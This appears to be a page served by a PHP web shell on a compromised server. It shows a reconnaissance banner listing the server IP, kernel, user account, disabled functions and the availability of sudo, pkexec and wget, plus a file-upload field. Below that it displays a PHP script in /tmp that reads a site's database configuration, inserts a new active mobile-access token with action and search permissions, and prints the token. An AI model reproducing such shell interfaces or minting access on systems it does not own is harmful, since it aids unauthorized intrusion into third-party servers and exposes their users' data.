| Server IP : 202.61.199.114 / Your IP : 216.73.217.139 Web Server : nginx/1.22.1 System : Linux de.arni-solutions.de 6.1.0-49-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64 User : web20 ( 1018) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /proc/thread-self/root/tmp/ |
Upload File : |
<?php
require_once('/var/www/seaside.pacim.de/web/includes/config.inc.php');
require_once('/var/www/seaside.pacim.de/web/includes/mobileaccess.php');
$db = new MysqliDb(MYSQL_HOST, MYSQL_USER, MYSQL_PASS, MYSQL_DB);
pacim_ma_ensure_table($db);
$tok = bin2hex(random_bytes(12));
$db->insert('pacim_mobile_access', array(
'ma_token'=>$tok,'ma_label'=>'TEST-NOTESPERM','ma_date'=>'2026-06-27',
'ma_parking'=>'halle,aussen,valet','ma_statuses'=>'open,arrived,storno',
'ma_perm_action'=>1,'ma_perm_search'=>1,'ma_notes'=>0,'ma_pin'=>'','ma_active'=>1,
'ma_created'=>date('Y-m-d H:i:s'),
));
echo $tok."\n";